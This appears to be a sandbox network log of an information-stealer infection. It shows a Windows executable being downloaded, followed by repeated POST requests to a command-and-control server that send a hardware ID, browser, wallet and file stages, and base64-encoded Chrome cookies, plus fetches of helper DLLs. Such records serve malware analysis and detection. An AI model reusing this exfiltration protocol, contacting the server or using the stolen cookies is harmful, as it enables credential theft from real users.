Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 23 Apr 2024 07:43:27 GMTContent-Type: application/x-msdos-programContent-Length: 80880Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "13bf0-5e7e950876500"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AAEBAFBGIDHCBFHIECFCHost: 185.172.128.76Content-Length: 216Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 41 45 42 41 46 42 47 49 44 48 43 42 46 48 49 45 43 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 46 32 44 30 30 41 35 41 30 43 36 32 35 30 37 32 38 36 39 35 38 0d 0a 2d 2d 2d 2d 2d 2d 41 41 45 42 41 46 42 47 49 44 48 43 42 46 48 49 45 43 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 31 30 0d 0a 2d 2d 2d 2d 2d 2d 41 41 45 42 41 46 42 47 49 44 48 43 42 46 48 49 45 43 46 43 2d 2d 0d 0a Data Ascii: ------AAEBAFBGIDHCBFHIECFCContent-Disposition: form-data; name="hwid"5F2D00A5A0C62507286958------AAEBAFBGIDHCBFHIECFCContent-Disposition: form-data; name="build"default10------AAEBAFBGIDHCBFHIECFC--
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IEBFHCAKFBGDHIDHIDBKHost: 185.172.128.76Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 45 42 46 48 43 41 4b 46 42 47 44 48 49 44 48 49 44 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 39 65 61 64 65 65 63 63 65 66 66 30 33 62 34 61 63 32 36 33 37 62 30 30 30 31 30 62 30 35 38 61 32 62 38 62 30 65 64 64 61 66 38 66 30 33 65 61 66 33 66 37 34 34 32 35 32 30 32 63 66 62 62 64 34 37 30 64 35 37 38 0d 0a 2d 2d 2d 2d 2d 2d 49 45 42 46 48 43 41 4b 46 42 47 44 48 49 44 48 49 44 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 49 45 42 46 48 43 41 4b 46 42 47 44 48 49 44 48 49 44 42 4b 2d 2d 0d 0a Data Ascii: ------IEBFHCAKFBGDHIDHIDBKContent-Disposition: form-data; name="token"f9eadeecceff03b4ac2637b00010b058a2b8b0eddaf8f03eaf3f74425202cfbbd470d578------IEBFHCAKFBGDHIDHIDBKContent-Disposition: form-data; name="message"browsers------IEBFHCAKFBGDHIDHIDBK--
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GIJDGCAEBFIIECAKFHIJHost: 185.172.128.76Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 49 4a 44 47 43 41 45 42 46 49 49 45 43 41 4b 46 48 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 39 65 61 64 65 65 63 63 65 66 66 30 33 62 34 61 63 32 36 33 37 62 30 30 30 31 30 62 30 35 38 61 32 62 38 62 30 65 64 64 61 66 38 66 30 33 65 61 66 33 66 37 34 34 32 35 32 30 32 63 66 62 62 64 34 37 30 64 35 37 38 0d 0a 2d 2d 2d 2d 2d 2d 47 49 4a 44 47 43 41 45 42 46 49 49 45 43 41 4b 46 48 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 47 49 4a 44 47 43 41 45 42 46 49 49 45 43 41 4b 46 48 49 4a 2d 2d 0d 0a Data Ascii: ------GIJDGCAEBFIIECAKFHIJContent-Disposition: form-data; name="token"f9eadeecceff03b4ac2637b00010b058a2b8b0eddaf8f03eaf3f74425202cfbbd470d578------GIJDGCAEBFIIECAKFHIJContent-Disposition: form-data; name="message"plugins------GIJDGCAEBFIIECAKFHIJ--
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EBGDHJECFCFCAKFHCFIDHost: 185.172.128.76Content-Length: 6911Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /15f649199f40275b/sqlite3.dll HTTP/1.1Host: 185.172.128.76Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AKFHCAKJDBKKEBFIIJJEHost: 185.172.128.76Content-Length: 751Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 4b 46 48 43 41 4b 4a 44 42 4b 4b 45 42 46 49 49 4a 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 39 65 61 64 65 65 63 63 65 66 66 30 33 62 34 61 63 32 36 33 37 62 30 30 30 31 30 62 30 35 38 61 32 62 38 62 30 65 64 64 61 66 38 66 30 33 65 61 66 33 66 37 34 34 32 35 32 30 32 63 66 62 62 64 34 37 30 64 35 37 38 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 46 48 43 41 4b 4a 44 42 4b 4b 45 42 46 49 49 4a 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 30 52 6c 5a 6d 46 31 62 48 51 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 46 48 43 41 4b 4a 44 42 4b 4b 45 42 46 49 49 4a 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 4c 6d 64 76 62 32 64 73 5a 53 35 6a 62 32 30 4a 56 46 4a 56 52 51 6b 76 43 55 5a 42 54 46 4e 46 43 54 45 32 4f 54 6b 77 4e 7a 59 31 4e 44 45 4a 4d 56 42 66 53 6b 46 53 43 54 49 77 4d 6a 4d 74 4d 54 41 74 4d 44 55 74 4d 44 63 4b 4c 6d 64 76 62 32 64 73 5a 53 35 6a 62 32 30 4a 52 6b 46 4d 55 30 55 4a 4c 77 6c 47 51 55 78 54 52 51 6b 78 4e 7a 45 79 4d 6a 6b 31 4e 7a 51 77 43 55 35 4a 52 41 6b 31 4d 54 45 39 62 6b 35 68 5a 48 46 58 4f 58 56 55 59 31 6b 77 54 31 41 32 53 54 4e 68 5a 6d 35 79 4e 7a 46 76 4e 6b 56 36 59 56 6c 4d 63 32 52 77 56 7a 52 56 52 56 6c 4f 4d 33 5a 5a 63 56 39 79 59 6c 4a 79 54 6b 5a 34 54 54 46 71 62 33 70 51 52 33 56 6f 61 6b 39 53 51 6c 70 4c 53 30 31 36 4d 6e 52 6b 52 48 42 57 5a 54 64 6b 54 6e 56 55 56 33 41 30 51 33 6c 4c 4c 58 70 30 4e 55 6c 7a 4e 6e 64 57 52 57 78 32 5a 56 64 42 5a 6b 74 52 5a 33 64 4f 53 6d 6c 4c 53 33 52 59 53 45 4e 44 51 32 31 79 62 47 64 36 57 6c 52 73 4e 55 4e 70 53 32 70 55 5a 55 45 79 61 56 46 78 5a 6a 5a 36 62 46 4a 4c 4d 6d 67 34 64 32 63 78 61 46 5a 77 53 58 4e 58 63 32 46 4c 63 57 46 58 53 6e 6c 49 54 56 42 47 4d 30 70 42 43 67 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 46 48 43 41 4b 4a 44 42 4b 4b 45 42 46 49 49 4a 4a 45 2d 2d 0d 0a Data Ascii: ------AKFHCAKJDBKKEBFIIJJEContent-Disposition: form-data; name="token"f9eadeecceff03b4ac2637b00010b058a2b8b0eddaf8f03eaf3f74425202cfbbd470d578------AKFHCAKJDBKKEBFIIJJEContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lX0RlZmF1bHQudHh0------AKFHCAKJDBKKEBFIIJJEContent-Disposition: form-data; name="file"Lmdvb2dsZS5jb20JVFJVRQkvCUZBTFNFCTE2OTkwNzY1NDEJMVBfSkFSCTIwMjMtMTAtMDUtMDcKLmdvb2dsZS5jb20JRkFMU0UJLwlGQUxTRQkxNzEyMjk1NzQwCU5JRAk1MTE9bk5hZHFXOXVUY1kwT1A2STNhZm5yNzFvNkV6Y
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HIIIEGDBKJKEBGCBAFCFHost: 185.172.128.76Content-Length: 359Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 49 49 49 45 47 44 42 4b 4a 4b 45 42 47 43 42 41 46 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 39 65 61 64 65 65 63 63 65 66 66 30 33 62 34 61 63 32 36 33 37 62 30 30 30 31 30 62 30 35 38 61 32 62 38 62 30 65 64 64 61 66 38 66 30 33 65 61 66 33 66 37 34 34 32 35 32 30 32 63 66 62 62 64 34 37 30 64 35 37 38 0d 0a 2d 2d 2d 2d 2d 2d 48 49 49 49 45 47 44 42 4b 4a 4b 45 42 47 43 42 41 46 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 4e 54 45 35 4d 54 6b 78 4f 44 67 31 4c 6d 5a 70 62 47 55 3d 0d 0a 2d 2d 2d 2d 2d 2d 48 49 49 49 45 47 44 42 4b 4a 4b 45 42 47 43 42 41 46 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 48 49 49 49 45 47 44 42 4b 4a 4b 45 42 47 43 42 41 46 43 46 2d 2d 0d 0a Data Ascii: ------HIIIEGDBKJKEBGCBAFCFContent-Disposition: form-data; name="token"f9eadeecceff03b4ac2637b00010b058a2b8b0eddaf8f03eaf3f74425202cfbbd470d578------HIIIEGDBKJKEBGCBAFCFContent-Disposition: form-data; name="file_name"NTE5MTkxODg1LmZpbGU=------HIIIEGDBKJKEBGCBAFCFContent-Disposition: form-data; name="file"------HIIIEGDBKJKEBGCBAFCF--
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AAEBAFBGIDHCBFHIECFCHost: 185.172.128.76Content-Length: 359Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 41 45 42 41 46 42 47 49 44 48 43 42 46 48 49 45 43 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 39 65 61 64 65 65 63 63 65 66 66 30 33 62 34 61 63 32 36 33 37 62 30 30 30 31 30 62 30 35 38 61 32 62 38 62 30 65 64 64 61 66 38 66 30 33 65 61 66 33 66 37 34 34 32 35 32 30 32 63 66 62 62 64 34 37 30 64 35 37 38 0d 0a 2d 2d 2d 2d 2d 2d 41 41 45 42 41 46 42 47 49 44 48 43 42 46 48 49 45 43 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 4e 54 45 35 4d 54 6b 78 4f 44 67 31 4c 6d 5a 70 62 47 55 3d 0d 0a 2d 2d 2d 2d 2d 2d 41 41 45 42 41 46 42 47 49 44 48 43 42 46 48 49 45 43 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 41 41 45 42 41 46 42 47 49 44 48 43 42 46 48 49 45 43 46 43 2d 2d 0d 0a Data Ascii: ------AAEBAFBGIDHCBFHIECFCContent-Disposition: form-data; name="token"f9eadeecceff03b4ac2637b00010b058a2b8b0eddaf8f03eaf3f74425202cfbbd470d578------AAEBAFBGIDHCBFHIECFCContent-Disposition: form-data; name="file_name"NTE5MTkxODg1LmZpbGU=------AAEBAFBGIDHCBFHIECFCContent-Disposition: form-data; name="file"------AAEBAFBGIDHCBFHIECFC--
Source: global traffic	HTTP traffic detected: GET /15f649199f40275b/freebl3.dll HTTP/1.1Host: 185.172.128.76Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /15f649199f40275b/mozglue.dll HTTP/1.1Host: 185.172.128.76Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /15f649199f40275b/msvcp140.dll HTTP/1.1Host: 185.172.128.76Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /15f649199f40275b/nss3.dll HTTP/1.1Host: 185.172.128.76Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /15f649199f40275b/softokn3.dll HTTP/1.1Host: 185.172.128.76Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /15f649199f40275b/vcruntime140.dll HTTP/1.1Host: 185.172.128.76Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EHJKJDGCGDAKFHIDBGCBHost: 185.172.128.76Content-Length: 1067Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HJJKFBGCFHCGDHIDAAECHost: 185.172.128.76Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 4a 4a 4b 46 42 47 43 46 48 43 47 44 48 49 44 41 41 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 39 65 61 64 65 65 63 63 65 66 66 30 33 62 34 61 63 32 36 33 37 62 30 30 30 31 30 62 30 35 38 61 32 62 38 62 30 65 64 64 61 66 38 66 30 33 65 61 66 33 66 37 34 34 32 35 32 30 32 63 66 62 62 64 34 37 30 64 35 37 38 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4a 4b 46 42 47 43 46 48 43 47 44 48 49 44 41 41 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4a 4b 46 42 47 43 46 48 43 47 44 48 49 44 41 41 45 43 2d 2d 0d 0a Data Ascii: ------HJJKFBGCFHCGDHIDAAECContent-Disposition: form-data; name="token"f9eadeecceff03b4ac2637b00010b058a2b8b0eddaf8f03eaf3f74425202cfbbd470d578------HJJKFBGCFHCGDHIDAAECContent-Disposition: form-data; name="message"wallets------HJJKFBGCFHCGDHIDAAEC--
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HJJJECFIECBGDGCAAAEHHost: 185.172.128.76Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 4a 4a 4a 45 43 46 49 45 43 42 47 44 47 43 41 41 41 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 39 65 61 64 65 65 63 63 65 66 66 30 33 62 34 61 63 32 36 33 37 62 30 30 30 31 30 62 30 35 38 61 32 62 38 62 30 65 64 64 61 66 38 66 30 33 65 61 66 33 66 37 34 34 32 35 32 30 32 63 66 62 62 64 34 37 30 64 35 37 38 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4a 4a 45 43 46 49 45 43 42 47 44 47 43 41 41 41 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4a 4a 45 43 46 49 45 43 42 47 44 47 43 41 41 41 45 48 2d 2d 0d 0a Data Ascii: ------HJJJECFIECBGDGCAAAEHContent-Disposition: form-data; name="token"f9eadeecceff03b4ac2637b00010b058a2b8b0eddaf8f03eaf3f74425202cfbbd470d578------HJJJECFIECBGDGCAAAEHContent-Disposition: form-data; name="message"files------HJJJECFIECBGDGCAAAEH--
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DGHIDAFCGIEHIEBFCFBAHost: 185.172.128.76Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AAAAAAAAAAAAAAAAAAAAHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JDAFBKECAKFCAAAKJDAKHost: 185.172.128.76Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IDHIDBAEGIIIDHJKEGDBHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BFCFBFBFBKFIDHJKFCAFHost: 185.172.128.76Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DBKKFCBAKKFBGCBFHJDGHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HJJJECFIECBGDGCAAAEHHost: 185.172.128.76Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BKECFIIEHCFHIECAFBAKHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FBKECFIIEHCFHIECAFBAHost: 185.172.128.76Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----ECBGHCGCBKFIECBFHIDGHost: 185.172.128.76Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GCGDHJDAFHJEBFIDAFHIHost: 185.172.128.76Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JEHIIDGCFHIEGDGCBFHDHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IJDGCAEBFIIECAKFHIJEHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KKKJEHCGCGDAAAKFHJKJHost: 185.172.128.76Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EHDGCGIDAKEBKECAFIEHHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CGDHDHJEBGHJKFIECBGCHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DGHIDAFCGIEHIEBFCFBAHost: 185.172.128.76Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FIIIIDGHJEBFBGDHDGIIHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JJDBAEHIJKJKEBFIEGHIHost: 185.172.128.76Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KEGCFCAKFHCGCBFHCGHDHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FIIIIDGHJEBFBGDHDGIIHost: 185.172.128.76Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----ECGHJJEHDHCAAKFIIDGIHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BGDGHJEHJJDAAAKEBGCFHost: 185.172.128.76Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HJJJECFIECBGDGCAAAEHHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FBGCAAAAFBKEBFHJEGCFHost: 185.172.128.76Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
